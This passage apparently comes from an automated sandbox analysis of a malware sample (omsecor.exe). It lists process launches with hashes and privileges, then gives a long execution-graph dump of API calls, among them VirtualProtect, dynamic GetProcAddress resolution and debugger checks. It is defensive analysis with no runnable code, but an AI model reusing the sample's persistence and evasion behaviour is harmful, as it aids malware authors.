                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:16
                        Start time:12:10:08
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:A4BA09D8D586AF0201C2E6584BE09E59
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:17
                        Start time:12:10:08
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 280
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:18
                        Start time:12:10:09
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:A4BA09D8D586AF0201C2E6584BE09E59
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:20
                        Start time:12:10:09
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8132 -s 276
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:23
                        Start time:12:10:57
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:75B0F2A9AD432A0DBC138A050D744956
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:24
                        Start time:12:10:58
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:75B0F2A9AD432A0DBC138A050D744956
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:26
                        Start time:12:10:58
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:50E482AEFE2A49BBCB4AAEE1B8C70305
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:27
                        Start time:12:10:58
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 248
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:28
                        Start time:12:10:58
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:50E482AEFE2A49BBCB4AAEE1B8C70305
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        Target ID:30
                        Start time:12:10:59
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 260
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:3.1%
                          Dynamic/Decrypted Code Coverage:0.3%
                          Signature Coverage:8.3%
                          Total number of Nodes:1163
                          Total number of Limit Nodes:12
                          execution_graph 3534 4012c0 FindFirstFileA 3537 401080 GetTickCount 3534->3537 3536 4012e8 3549 401655 3537->3549 3539 4010a2 3540 4010b1 GetDesktopWindow GetClassNameA 3539->3540 3541 4010e7 GlobalAlloc 3539->3541 3540->3539 3552 4012f0 3541->3552 3543 401116 3544 40112c GetCurrentProcess GetProcessIoCounters GetCurrentProcess GetProcessTimes 3543->3544 3546 4011ca 3543->3546 3544->3543 3547 4012a5 ExitProcess 3546->3547 3556 401000 3546->3556 3560 401d3d 3549->3560 3553 401308 3552->3553 3554 40132f __VEC_memcpy 3553->3554 3555 401337 3553->3555 3554->3555 3555->3543 3557 40106d 3556->3557 3558 40101a 3556->3558 3557->3546 3559 401020 GetTickCount 3558->3559 3559->3557 3559->3559 3565 401cc6 GetLastError 3560->3565 3562 401d43 3564 40165a 3562->3564 3580 402149 3562->3580 3564->3539 3587 401b98 TlsGetValue 3565->3587 3568 401d31 SetLastError 3568->3562 3569 401ce3 3592 404032 3569->3592 3574 401d10 3607 401c07 3574->3607 3575 401d28 3621 403f64 3575->3621 3578 401d18 GetCurrentThreadId 3578->3568 3579 401d2e 3579->3568 3581 402605 __FF_MSGBANNER 67 API calls 3580->3581 3582 40214e 3581->3582 3583 402465 __amsg_exit 67 API calls 3582->3583 3584 402157 3583->3584 3585 401b21 __amsg_exit 67 API calls 3584->3585 3586 402162 3585->3586 3586->3564 3588 401bc6 3587->3588 3589 401bab 3587->3589 3588->3568 3588->3569 3590 401b21 __amsg_exit 65 API calls 3589->3590 3591 401bb6 TlsSetValue 3590->3591 3591->3588 3595 404036 3592->3595 3594 401cef 3594->3568 3597 401b21 TlsGetValue 3594->3597 3595->3594 3596 404056 Sleep 3595->3596 3634 406717 3595->3634 3596->3595 3598 401b34 3597->3598 3599 401b55 GetModuleHandleA 3597->3599 3598->3599 3600 401b3e TlsGetValue 3598->3600 3601 401b66 3599->3601 3606 401b4d 3599->3606 3603 401b49 3600->3603 3894 401a3e 3601->3894 3603->3599 3603->3606 3604 401b6b 3605 401b6f GetProcAddress 3604->3605 3604->3606 3605->3606 3606->3574 3606->3575 3906 402f98 3607->3906 3609 401c13 GetModuleHandleA 3610 401c64 InterlockedIncrement 3609->3610 3611 401c35 3609->3611 3612 4034ee __lock 63 API calls 3610->3612 3613 401a3e __init_pointers 63 API calls 3611->3613 3614 401c8b 3612->3614 3615 401c3a 3613->3615 3907 40365f InterlockedIncrement 3614->3907 3615->3610 3616 401c3e GetProcAddress GetProcAddress 3615->3616 3616->3610 3618 401caa 3919 401cbd 3618->3919 3620 401cb7 _raise 3620->3578 3623 403f70 _raise 3621->3623 3622 403fe9 _raise _realloc 3622->3579 3623->3622 3625 4034ee __lock 65 API calls 3623->3625 3633 403faf 3623->3633 3624 403fc4 HeapFree 3624->3622 3626 403fd6 3624->3626 3630 403f87 ___sbh_find_block 3625->3630 3627 40427c _strcat_s 65 API calls 3626->3627 3628 403fdb GetLastError 3627->3628 3628->3622 3629 403fa1 3930 403fba 3629->3930 3630->3629 3923 4050b8 3630->3923 3633->3622 3633->3624 3635 406723 _raise 3634->3635 3636 40673b 3635->3636 3646 40675a _memset 3635->3646 3647 40427c 3636->3647 3640 4067cc RtlAllocateHeap 3640->3646 3641 406750 _raise 3641->3595 3646->3640 3646->3641 3653 4034ee 3646->3653 3660 405861 3646->3660 3666 406813 3646->3666 3669 404832 3646->3669 3648 401cc6 _raise 67 API calls 3647->3648 3649 404281 3648->3649 3650 40421d 3649->3650 3651 401b21 __amsg_exit 67 API calls 3650->3651 3652 40422b __invoke_watson 3651->3652 3654 403501 3653->3654 3655 403514 RtlEnterCriticalSection 3653->3655 3672 40342b 3654->3672 3655->3646 3657 403507 3657->3655 3658 402149 __amsg_exit 66 API calls 3657->3658 3659 403513 3658->3659 3659->3655 3662 40588d 3660->3662 3661 405926 3665 40592f 3661->3665 3889 40547c 3661->3889 3662->3661 3662->3665 3882 4053cc 3662->3882 3665->3646 3893 403416 RtlLeaveCriticalSection 3666->3893 3668 40681a 3668->3646 3670 401b21 __amsg_exit 67 API calls 3669->3670 3671 40483d 3670->3671 3671->3646 3673 403437 _raise 3672->3673 3674 40345d 3673->3674 3698 402605 3673->3698 3682 40346d _raise 3674->3682 3744 403ff2 3674->3744 3680 40348e 3686 4034ee __lock 67 API calls 3680->3686 3681 40347f 3685 40427c _strcat_s 67 API calls 3681->3685 3682->3657 3685->3682 3687 403495 3686->3687 3688 4034c9 3687->3688 3689 40349d 3687->3689 3690 403f64 __freea 67 API calls 3688->3690 3749 404763 3689->3749 3692 4034ba 3690->3692 3762 4034e5 3692->3762 3693 4034a8 3693->3692 3694 403f64 __freea 67 API calls 3693->3694 3696 4034b4 3694->3696 3697 40427c _strcat_s 67 API calls 3696->3697 3697->3692 3765 404c30 3698->3765 3700 40260c 3701 402619 3700->3701 3702 404c30 __FF_MSGBANNER 67 API calls 3700->3702 3703 402465 __amsg_exit 67 API calls 3701->3703 3705 40263b 3701->3705 3702->3701 3704 402631 3703->3704 3706 402465 __amsg_exit 67 API calls 3704->3706 3707 402465 3705->3707 3706->3705 3708 402471 3707->3708 3709 404c30 __FF_MSGBANNER 64 API calls 3708->3709 3740 4025c7 3708->3740 3710 402491 3709->3710 3711 4025cc GetStdHandle 3710->3711 3712 404c30 __FF_MSGBANNER 64 API calls 3710->3712 3713 4025da _strlen 3711->3713 3711->3740 3714 4024a2 3712->3714 3716 4025f4 WriteFile 3713->3716 3713->3740 3714->3711 3715 4024b4 3714->3715 3715->3740 3772 404bcb 3715->3772 3716->3740 3719 4024ea GetModuleFileNameA 3721 402508 3719->3721 3727 40252b _strlen 3719->3727 3723 404bcb _strcpy_s 64 API calls 3721->3723 3724 402518 3723->3724 3726 404121 __invoke_watson 10 API calls 3724->3726 3724->3727 3725 40256e 3797 404a11 3725->3797 3726->3727 3727->3725 3788 404a82 3727->3788 3731 402592 3734 404a11 _strcat_s 64 API calls 3731->3734 3733 404121 __invoke_watson 10 API calls 3733->3731 3735 4025a3 3734->3735 3737 4025b4 3735->3737 3738 404121 __invoke_watson 10 API calls 3735->3738 3736 404121 __invoke_watson 10 API calls 3736->3725 3806 404854 3737->3806 3738->3737 3741 402193 3740->3741 3843 40216d GetModuleHandleA 3741->3843 3746 403ff6 3744->3746 3747 403478 3746->3747 3748 40400e Sleep 3746->3748 3846 406654 3746->3846 3747->3680 3747->3681 3748->3746 3750 40476f _raise 3749->3750 3751 401b21 __amsg_exit 65 API calls 3750->3751 3752 40477f 3751->3752 3756 4047d3 _raise 3752->3756 3864 4021f2 3752->3864 3754 40478f 3755 40479e 3754->3755 3757 404121 __invoke_watson 10 API calls 3754->3757 3758 4047a7 GetModuleHandleA 3755->3758 3760 4047c8 3755->3760 3756->3693 3757->3755 3759 4047b6 GetProcAddress 3758->3759 3758->3760 3759->3760 3871 401aaa TlsGetValue 3760->3871 3881 403416 RtlLeaveCriticalSection 3762->3881 3764 4034ec 3764->3682 3766 404c3b 3765->3766 3767 404c45 3766->3767 3768 40427c _strcat_s 67 API calls 3766->3768 3767->3700 3769 404c5e 3768->3769 3770 40421d _strcat_s 67 API calls 3769->3770 3771 404c6e 3770->3771 3771->3700 3773 404be0 3772->3773 3774 404bd8 3772->3774 3775 40427c _strcat_s 67 API calls 3773->3775 3774->3773 3776 404c07 3774->3776 3780 404be5 3775->3780 3778 4024d6 3776->3778 3779 40427c _strcat_s 67 API calls 3776->3779 3777 40421d _strcat_s 67 API calls 3777->3778 3778->3719 3781 404121 3778->3781 3779->3780 3780->3777 3782 405f60 _memset 3781->3782 3783 4041b2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3782->3783 3784 4041f5 GetCurrentProcess TerminateProcess 3783->3784 3787 4041e9 __invoke_watson 3783->3787 3785 401662 setSBUpLow 5 API calls 3784->3785 3786 4024e7 3785->3786 3786->3719 3787->3784 3793 404a92 3788->3793 3789 404a96 3790 40427c _strcat_s 67 API calls 3789->3790 3791 40255b 3789->3791 3792 404ab2 3790->3792 3791->3725 3791->3736 3794 40421d _strcat_s 67 API calls 3792->3794 3793->3789 3793->3791 3795 404adc 3793->3795 3794->3791 3795->3791 3796 40427c _strcat_s 67 API calls 3795->3796 3796->3792 3798 404a26 3797->3798 3800 404a1e 3797->3800 3799 40427c _strcat_s 67 API calls 3798->3799 3805 404a2b 3799->3805 3800->3798 3802 404a5b 3800->3802 3801 40421d _strcat_s 67 API calls 3803 402581 3801->3803 3802->3803 3804 40427c _strcat_s 67 API calls 3802->3804 3803->3731 3803->3733 3804->3805 3805->3801 3807 401b18 _raise 61 API calls 3806->3807 3808 404862 3807->3808 3809 40487c LoadLibraryA 3808->3809 3813 404924 3808->3813 3810 404891 GetProcAddress 3809->3810 3823 4049f5 3809->3823 3812 4048a7 3810->3812 3810->3823 3811 4049af 3815 401b21 __amsg_exit 61 API calls 3811->3815 3839 404994 3811->3839 3816 401aaa __init_pointers 61 API calls 3812->3816 3813->3811 3817 401b21 __amsg_exit 61 API calls 3813->3817 3814 401b21 __amsg_exit 61 API calls 3814->3823 3824 4049bf 3815->3824 3818 4048ad GetProcAddress 3816->3818 3819 404944 3817->3819 3820 401aaa __init_pointers 61 API calls 3818->3820 3821 401b21 __amsg_exit 61 API calls 3819->3821 3822 4048c2 GetProcAddress 3820->3822 3836 404951 3821->3836 3825 401aaa __init_pointers 61 API calls 3822->3825 3823->3740 3828 401b21 __amsg_exit 61 API calls 3824->3828 3824->3839 3826 4048d7 3825->3826 3827 4021f2 ___crtInitCritSecAndSpinCount 61 API calls 3826->3827 3829 4048e5 3827->3829 3828->3839 3830 4048f5 3829->3830 3832 404121 __invoke_watson 10 API calls 3829->3832 3830->3813 3833 4048fe GetProcAddress 3830->3833 3831 40497c 3834 402229 __init_pointers 61 API calls 3831->3834 3832->3830 3835 401aaa __init_pointers 61 API calls 3833->3835 3837 404985 3834->3837 3838 40490c 3835->3838 3836->3811 3836->3831 3837->3839 3841 404121 __invoke_watson 10 API calls 3837->3841 3838->3813 3840 404916 GetProcAddress 3838->3840 3839->3814 3842 401aaa __init_pointers 61 API calls 3840->3842 3841->3839 3842->3813 3844 40218c ExitProcess 3843->3844 3845 40217c GetProcAddress 3843->3845 3845->3844 3847 406701 3846->3847 3853 406662 3846->3853 3848 404832 _malloc 66 API calls 3847->3848 3849 406707 3848->3849 3851 40427c _strcat_s 66 API calls 3849->3851 3850 402605 __FF_MSGBANNER 66 API calls 3850->3853 3852 40670d 3851->3852 3852->3746 3853->3850 3854 406605 _malloc 66 API calls 3853->3854 3855 402465 __amsg_exit 66 API calls 3853->3855 3856 4066c5 RtlAllocateHeap 3853->3856 3857 402193 _malloc GetModuleHandleA GetProcAddress ExitProcess 3853->3857 3858 4066f8 3853->3858 3859 4066ec 3853->3859 3860 404832 _malloc 66 API calls 3853->3860 3862 4066ea 3853->3862 3854->3853 3855->3853 3856->3853 3857->3853 3858->3746 3861 40427c _strcat_s 66 API calls 3859->3861 3860->3853 3861->3862 3863 40427c _strcat_s 66 API calls 3862->3863 3863->3858 3865 4021fd 3864->3865 3866 40427c _strcat_s 67 API calls 3865->3866 3867 402223 3865->3867 3868 402202 3866->3868 3867->3754 3869 40421d _strcat_s 67 API calls 3868->3869 3870 402212 3869->3870 3870->3754 3872 401abd 3871->3872 3873 401ade GetModuleHandleA 3871->3873 3872->3873 3874 401ac7 TlsGetValue 3872->3874 3875 401ad6 3873->3875 3876 401aef 3873->3876 3878 401ad2 3874->3878 3875->3756 3877 401a3e __init_pointers 63 API calls 3876->3877 3879 401af4 3877->3879 3878->3873 3878->3875 3879->3875 3880 401af8 GetProcAddress 3879->3880 3880->3875 3881->3764 3883 405413 RtlAllocateHeap 3882->3883 3884 4053df RtlReAllocateHeap 3882->3884 3886 4053fd 3883->3886 3887 405436 VirtualAlloc 3883->3887 3885 405401 3884->3885 3884->3886 3885->3883 3886->3661 3887->3886 3888 405450 HeapFree 3887->3888 3888->3886 3890 405491 VirtualAlloc 3889->3890 3892 4054d8 3890->3892 3892->3665 3893->3668 3899 402229 3894->3899 3896 401a59 3897 401a60 __init_pointers 3896->3897 3898 401a64 GetModuleHandleA 3896->3898 3897->3604 3898->3897 3900 402234 3899->3900 3901 402259 3900->3901 3902 40427c _strcat_s 67 API calls 3900->3902 3901->3896 3903 402239 3902->3903 3904 40421d _strcat_s 67 API calls 3903->3904 3905 402249 3904->3905 3905->3896 3906->3609 3908 40367a InterlockedIncrement 3907->3908 3909 40367d 3907->3909 3908->3909 3910 403687 InterlockedIncrement 3909->3910 3911 40368a 3909->3911 3910->3911 3912 403694 InterlockedIncrement 3911->3912 3913 403697 3911->3913 3912->3913 3914 4036a1 InterlockedIncrement 3913->3914 3916 4036a4 3913->3916 3914->3916 3915 4036b9 InterlockedIncrement 3915->3916 3916->3915 3917 4036c9 InterlockedIncrement 3916->3917 3918 4036d2 InterlockedIncrement 3916->3918 3917->3916 3918->3618 3922 403416 RtlLeaveCriticalSection 3919->3922 3921 401cc4 3921->3620 3922->3921 3924 4050f5 3923->3924 3929 405397 3923->3929 3925 4052e1 VirtualFree 3924->3925 3924->3929 3926 405345 3925->3926 3927 405354 VirtualFree HeapFree 3926->3927 3926->3929 3928 4012f0 ___sbh_free_block __VEC_memcpy 3927->3928 3928->3929 3929->3629 3933 403416 RtlLeaveCriticalSection 3930->3933 3932 403fc1 3932->3633 3933->3932 4812 403000 4813 403038 4812->4813 4814 40302b 4812->4814 4816 401662 setSBUpLow 5 API calls 4813->4816 4815 401662 setSBUpLow 5 API calls 4814->4815 4815->4813 4819 403048 __except_handler4 4816->4819 4817 4030cf 4818 4030a4 __except_handler4 4818->4817 4820 4030bf 4818->4820 4821 401662 setSBUpLow 5 API calls 4818->4821 4819->4817 4819->4818 4824 4030e5 __except_handler4 4819->4824 4822 401662 setSBUpLow 5 API calls 4820->4822 4821->4820 4822->4817 4830 405c66 RtlUnwind 4824->4830 4825 403124 __except_handler4 4826 40315b 4825->4826 4828 401662 setSBUpLow 5 API calls 4825->4828 4827 401662 setSBUpLow 5 API calls 4826->4827 4829 40316b __except_handler4 4827->4829 4828->4826 4831 405c7b 4830->4831 4831->4825 4832 404800 4833 40480c SetLastError 4832->4833 4834 404814 _raise 4832->4834 4833->4834 4009 404348 4010 404032 __calloc_crt 67 API calls 4009->4010 4011 404352 4010->4011 4012 401aaa __init_pointers 67 API calls 4011->4012 4013 40435a 4012->4013 4835 401b8f TlsAlloc 4836 406c10 4837 406c22 4836->4837 4839 406c30 4836->4839 4838 401662 setSBUpLow 5 API calls 4837->4838 4838->4839 4014 404753 RtlInitializeCriticalSection 4015 405bd4 4016 405be6 4015->4016 4018 405bf4 @_EH4_CallFilterFunc@8 4015->4018 4019 401662 4016->4019 4020 40166a 4019->4020 4021 40166c IsDebuggerPresent 4019->4021 4020->4018 4027 4040c5 4021->4027 4024 4020c5 SetUnhandledExceptionFilter UnhandledExceptionFilter 4025 4020e2 __invoke_watson 4024->4025 4026 4020ea GetCurrentProcess TerminateProcess 4024->4026 4025->4026 4026->4018 4027->4024 4028 401d55 4029 401d61 _raise 4028->4029 4030 401d79 4029->4030 4032 401e55 _raise 4029->4032 4033 403f64 __freea 67 API calls 4029->4033 4031 401d87 4030->4031 4034 403f64 __freea 67 API calls 4030->4034 4035 401d95 4031->4035 4036 403f64 __freea 67 API calls 4031->4036 4033->4030 4034->4031 4037 401da3 4035->4037 4038 403f64 __freea 67 API calls 4035->4038 4036->4035 4039 401db1 4037->4039 4041 403f64 __freea 67 API calls 4037->4041 4038->4037 4040 401dbf 4039->4040 4042 403f64 __freea 67 API calls 4039->4042 4043 403f64 __freea 67 API calls 4040->4043 4045 401dd0 4040->4045 4041->4039 4042->4040 4043->4045 4044 4034ee __lock 67 API calls 4046 401dd8 4044->4046 4045->4044 4047 401de4 InterlockedDecrement 4046->4047 4048 401dfd 4046->4048 4047->4048 4050 401def 4047->4050 4062 401e61 4048->4062 4050->4048 4053 403f64 __freea 67 API calls 4050->4053 4052 4034ee __lock 67 API calls 4054 401e11 4052->4054 4053->4048 4055 401e42 4054->4055 4065 4036e5 4054->4065 4109 401e6d 4055->4109 4059 403f64 __freea 67 API calls 4059->4032 4112 403416 RtlLeaveCriticalSection 4062->4112 4064 401e0a 4064->4052 4066 401e26 4065->4066 4067 4036ee InterlockedDecrement 4065->4067 4066->4055 4079 40351f 4066->4079 4068 403704 InterlockedDecrement 4067->4068 4069 403707 4067->4069 4068->4069 4070 403711 InterlockedDecrement 4069->4070 4071 403714 4069->4071 4070->4071 4072 403721 4071->4072 4073 40371e InterlockedDecrement 4071->4073 4074 40372b InterlockedDecrement 4072->4074 4076 40372e 4072->4076 4073->4072 4074->4076 4075 403743 InterlockedDecrement 4075->4076 4076->4075 4077 403753 InterlockedDecrement 4076->4077 4078 40375c InterlockedDecrement 4076->4078 4077->4076 4078->4066 4080 4035a0 4079->4080 4083 403533 4079->4083 4081 403f64 __freea 67 API calls 4080->4081 4082 4035ed 4080->4082 4084 4035c1 4081->4084 4092 403614 4082->4092 4137 405c97 4082->4137 4083->4080 4089 403f64 __freea 67 API calls 4083->4089 4093 403567 4083->4093 4087 403f64 __freea 67 API calls 4084->4087 4091 4035d4 4087->4091 4088 403f64 __freea 67 API calls 4088->4092 4095 40355c 4089->4095 4090 403653 4096 403f64 __freea 67 API calls 4090->4096 4097 403f64 __freea 67 API calls 4091->4097 4092->4090 4104 403f64 67 API calls __freea 4092->4104 4098 403f64 __freea 67 API calls 4093->4098 4108 403588 4093->4108 4094 403f64 __freea 67 API calls 4099 403595 4094->4099 4113 405e67 4095->4113 4101 403659 4096->4101 4102 4035e2 4097->4102 4103 40357d 4098->4103 4105 403f64 __freea 67 API calls 4099->4105 4101->4055 4106 403f64 __freea 67 API calls 4102->4106 4129 405e27 4103->4129 4104->4092 4105->4080 4106->4082 4108->4094 4225 403416 RtlLeaveCriticalSection 4109->4225 4111 401e4f 4111->4059 4112->4064 4114 405e70 4113->4114 4128 405eed 4113->4128 4115 403f64 __freea 67 API calls 4114->4115 4116 405e81 4114->4116 4115->4116 4117 403f64 __freea 67 API calls 4116->4117 4119 405e93 4116->4119 4117->4119 4118 405ea5 4121 405eb7 4118->4121 4123 403f64 __freea 67 API calls 4118->4123 4119->4118 4120 403f64 __freea 67 API calls 4119->4120 4120->4118 4122 405ec9 4121->4122 4124 403f64 __freea 67 API calls 4121->4124 4125 405edb 4122->4125 4126 403f64 __freea 67 API calls 4122->4126 4123->4121 4124->4122 4127 403f64 __freea 67 API calls 4125->4127 4125->4128 4126->4125 4127->4128 4128->4093 4130 405e64 4129->4130 4132 405e30 4129->4132 4130->4108 4131 405e40 4133 405e52 4131->4133 4135 403f64 __freea 67 API calls 4131->4135 4132->4131 4134 403f64 __freea 67 API calls 4132->4134 4133->4130 4136 403f64 __freea 67 API calls 4133->4136 4134->4131 4135->4133 4136->4130 4138 405ca4 4137->4138 4224 40360d 4137->4224 4139 403f64 __freea 67 API calls 4138->4139 4140 405cac 4139->4140 4141 403f64 __freea 67 API calls 4140->4141 4142 405cb4 4141->4142 4143 403f64 __freea 67 API calls 4142->4143 4144 405cbc 4143->4144 4145 403f64 __freea 67 API calls 4144->4145 4146 405cc4 4145->4146 4147 403f64 __freea 67 API calls 4146->4147 4148 405ccc 4147->4148 4149 403f64 __freea 67 API calls 4148->4149 4150 405cd4 4149->4150 4151 403f64 __freea 67 API calls 4150->4151 4152 405cdb 4151->4152 4153 403f64 __freea 67 API calls 4152->4153 4154 405ce3 4153->4154 4155 403f64 __freea 67 API calls 4154->4155 4156 405ceb 4155->4156 4157 403f64 __freea 67 API calls 4156->4157 4158 405cf3 4157->4158 4159 403f64 __freea 67 API calls 4158->4159 4160 405cfb 4159->4160 4161 403f64 __freea 67 API calls 4160->4161 4162 405d03 4161->4162 4163 403f64 __freea 67 API calls 4162->4163 4164 405d0b 4163->4164 4165 403f64 __freea 67 API calls 4164->4165 4166 405d13 4165->4166 4167 403f64 __freea 67 API calls 4166->4167 4168 405d1b 4167->4168 4169 403f64 __freea 67 API calls 4168->4169 4170 405d23 4169->4170 4171 403f64 __freea 67 API calls 4170->4171 4172 405d2e 4171->4172 4173 403f64 __freea 67 API calls 4172->4173 4174 405d36 4173->4174 4175 403f64 __freea 67 API calls 4174->4175 4176 405d3e 4175->4176 4177 403f64 __freea 67 API calls 4176->4177 4178 405d46 4177->4178 4179 403f64 __freea 67 API calls 4178->4179 4180 405d4e 4179->4180 4181 403f64 __freea 67 API calls 4180->4181 4182 405d56 4181->4182 4183 403f64 __freea 67 API calls 4182->4183 4184 405d5e 4183->4184 4185 403f64 __freea 67 API calls 4184->4185 4186 405d66 4185->4186 4187 403f64 __freea 67 API calls 4186->4187 4188 405d6e 4187->4188 4189 403f64 __freea 67 API calls 4188->4189 4190 405d76 4189->4190 4191 403f64 __freea 67 API calls 4190->4191 4192 405d7e 4191->4192 4193 403f64 __freea 67 API calls 4192->4193 4194 405d86 4193->4194 4195 403f64 __freea 67 API calls 4194->4195 4196 405d8e 4195->4196 4197 403f64 __freea 67 API calls 4196->4197 4198 405d96 4197->4198 4199 403f64 __freea 67 API calls 4198->4199 4200 405d9e 4199->4200 4201 403f64 __freea 67 API calls 4200->4201 4202 405da6 4201->4202 4203 403f64 __freea 67 API calls 4202->4203 4204 405db4 4203->4204 4205 403f64 __freea 67 API calls 4204->4205 4206 405dbf 4205->4206 4207 403f64 __freea 67 API calls 4206->4207 4208 405dca 4207->4208 4209 403f64 __freea 67 API calls 4208->4209 4210 405dd5 4209->4210 4211 403f64 __freea 67 API calls 4210->4211 4212 405de0 4211->4212 4213 403f64 __freea 67 API calls 4212->4213 4214 405deb 4213->4214 4215 403f64 __freea 67 API calls 4214->4215 4216 405df6 4215->4216 4217 403f64 __freea 67 API calls 4216->4217 4218 405e01 4217->4218 4219 403f64 __freea 67 API calls 4218->4219 4220 405e0c 4219->4220 4221 403f64 __freea 67 API calls 4220->4221 4222 405e17 4221->4222 4223 403f64 __freea 67 API calls 4222->4223 4223->4224 4224->4088 4225->4111 3934 407a59 3935 407a70 3934->3935 3940 407ade 3934->3940 3935->3940 3947 407a98 GetModuleHandleA 3935->3947 3936 407b24 3960 407b29 3936->3960 3937 407ae7 GetModuleHandleA 3941 407af1 3937->3941 3940->3936 3940->3937 3940->3941 3941->3940 3942 407b11 GetProcAddress 3941->3942 3942->3940 3943 407a8f 3943->3940 3943->3941 3944 407ab2 GetProcAddress 3943->3944 3944->3940 3945 407abf VirtualProtect 3944->3945 3945->3940 3946 407ace VirtualProtect 3945->3946 3946->3940 3948 407aa1 3947->3948 3955 407ade 3947->3955 3968 407ab5 GetProcAddress 3948->3968 3950 407b24 3953 407b29 75 API calls 3950->3953 3951 407ae7 GetModuleHandleA 3958 407af1 3951->3958 3952 407aa6 3954 407ab2 GetProcAddress 3952->3954 3952->3955 3953->3950 3954->3955 3956 407abf VirtualProtect 3954->3956 3955->3950 3955->3951 3955->3958 3956->3955 3957 407ace VirtualProtect 3956->3957 3957->3955 3958->3955 3959 407b11 GetProcAddress 3958->3959 3959->3955 3961 4018b6 3960->3961 3985 403196 3961->3985 3963 4016d6 _raise 3964 4016e2 GetStartupInfoA GetProcessHeap RtlAllocateHeap 3963->3964 3965 401714 3964->3965 3977 401671 3965->3977 3967 40171b _raise 3967->3936 3969 407ade 3968->3969 3970 407abf VirtualProtect 3968->3970 3972 407b24 3969->3972 3973 407ae7 GetModuleHandleA 3969->3973 3970->3969 3971 407ace VirtualProtect 3970->3971 3971->3969 3974 407b29 75 API calls 3972->3974 3976 407af1 3973->3976 3974->3972 3975 407b11 GetProcAddress 3975->3976 3976->3969 3976->3975 3978 40167a 3977->3978 3979 40167f 3977->3979 3980 402605 __FF_MSGBANNER 67 API calls 3978->3980 3981 402465 __amsg_exit 67 API calls 3979->3981 3980->3979 3982 401688 3981->3982 3983 402193 _malloc 3 API calls 3982->3983 3984 401692 3983->3984 3984->3967 3986 4031c6 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3985->3986 3987 4031b9 3985->3987 3988 4031bd 3986->3988 3987->3986 3987->3988 3988->3963 4226 4023d9 4229 4022f7 4226->4229 4228 4023e6 4230 402303 _raise 4229->4230 4231 4034ee __lock 67 API calls 4230->4231 4232 40230a 4231->4232 4233 402379 _raise 4232->4233 4235 401b21 __amsg_exit 67 API calls 4232->4235 4249 4023c4 4233->4249 4237 402339 4235->4237 4239 401b21 __amsg_exit 67 API calls 4237->4239 4238 4023c1 _raise 4238->4228 4243 402347 4239->4243 4241 4023b8 4242 402193 _malloc 3 API calls 4241->4242 4242->4238 4243->4233 4245 401b21 __amsg_exit 67 API calls 4243->4245 4246 401b18 4243->4246 4245->4243 4247 